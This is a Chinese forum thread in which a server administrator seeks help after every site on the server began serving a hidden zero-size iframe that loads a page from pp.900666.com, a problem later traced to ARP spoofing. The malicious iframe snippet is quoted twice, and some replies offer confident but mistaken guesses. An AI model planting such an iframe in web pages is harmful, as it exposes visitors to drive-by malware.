SOS,给入侵了,服务器上的所有网站都给挂马了!

open777

SOS,给入侵了,服务器上的所有网站都给挂马了!

服务器给入侵了,服务器上面的所有网站都给挂马了!
每个网站,里面的每一页,顶部都挂了这句:
----------------
<iframe src=http://pp.900666.com/c.htm width=0 height=0></iframe>                                             
<html>
<head>
<meta http-equiv="Content-Type" c>
---------------

不知其是如何修改IIS或还是其他方法,将服务器上的所有网站,里面的每一页,顶部都挂了这句:<iframe>XXX </iframe>
查看每一网站的网页代码,都没有发现这一段代码!

真晕,我现如何应对好?

troika

删掉就可以了,没什么了不起的,另外就是我已经找到了病毒了,虽然层层加密但我还是找到了.卡巴不报我已经上报了.

open777

现问题是:
查看每一网站的网页代码,都没有发现这一段代码!
ISAPI筛选器里面也没有插加.

无从下手,不知如何应对?!

troika

既然你是管理员,那么可以通过远程登陆进入.你又说有这个代码又说没这个代码,我不懂什么意思?

open777

具体是:
1.服务器上的所有网站,里面的每一页,顶部都挂了这句:<iframe>XXX </iframe>
2.查看每一网站的网页代码,都没有发现这一段代码!

可能是入侵后,给IIS里添加什么..........
以至网页在执行浏览后,那段代码就生效出来了!

技术不到家,不知如何处理好!

troika

是黑客入侵后在每个网站的首页挂马的,因为一般人进入网站都是从首页进入的,所以挂在首页就行了,每个网页都挂根本没有必要.

至于黑客怎么进去的,有多种原因,可以是asp漏洞或通过mysql进入,或windows漏洞进入,你最好找个高手来查原因,另外就是挂马的毒已经可以杀了.

firelife

我大概懂楼主的意思了,
应该是每个主页打开都显示出
----------------
<iframe src=http://pp.900666.com/c.htm width=0 height=0></iframe>                                             
<html>
<head>
<meta http-equiv="Content-Type" c>
---------------
这段代码.
但是查看网页的源文件却又没有看到

虽然懂楼主的意思,但帮不了忙...........我比较菜

open777

多谢楼上的帮忙,我唯有慢慢想办法了!

open777

多谢帮忙,问题解决了,是ARP欺骗攻击,让机房技术人员处理了!